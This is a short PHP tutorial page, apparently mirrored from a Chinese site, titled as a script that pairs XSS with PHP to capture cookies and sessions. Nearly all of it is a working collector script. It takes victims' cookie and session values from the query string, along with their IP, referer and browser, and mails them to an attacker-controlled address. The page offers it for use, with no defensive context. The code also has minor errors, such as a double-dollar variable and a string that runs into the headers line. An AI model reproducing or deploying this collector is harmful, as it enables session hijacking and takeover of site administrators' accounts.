찾다

 >  기사  >  php教程  >  xss配合php获取cookie和session的脚本

xss配合php获取cookie和session的脚本

PHP中文网
PHP中文网원래의
2016-05-25 17:09:581884검색





1. [代码][PHP]代码              

<?php
$ip = $_SERVER[&#39;REMOTE_ADDR&#39;];
$to=&#39;xxx@yeah.net&#39;;
$referer = $_SERVER[&#39;HTTP_REFERER&#39;];
$cookie = $_GET[&#39;cookie&#39;]; 
$session = $_GET[&#39;session&#39;];
$agent = $_SERVER[&#39;HTTP_USER_AGENT&#39;];
$subject=&#39;远程XSS获取地址-域名:&#39;.$referer;
$body="<p> 远程管理员IP= ".$ip."<p> 访问时间=" . date(&#39;d-m-Y&#39;).
"<p> 后台地址=".$referer."<p> 浏览器类型=".$agent."<p> 当前页面地址=".$referer."<p> COOKIE信息=".$cookie."<p> Session信息=".$$session.&#39; &#39;.
$headers= &#39;MIME-Version: 1.0&#39; . "\r\n";
$headers.= &#39;Content-type: text/html; charset=utf-8&#39; . "\r\n";
$headers.="Cleanreport.com";
mail($to, $subject, $body, $headers);
?>

                   


                   

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
이전 기사:360通用防护 过滤用户输入的数据,实现防注다음 기사:php版 筛选需要的文件

관련 기사

더보기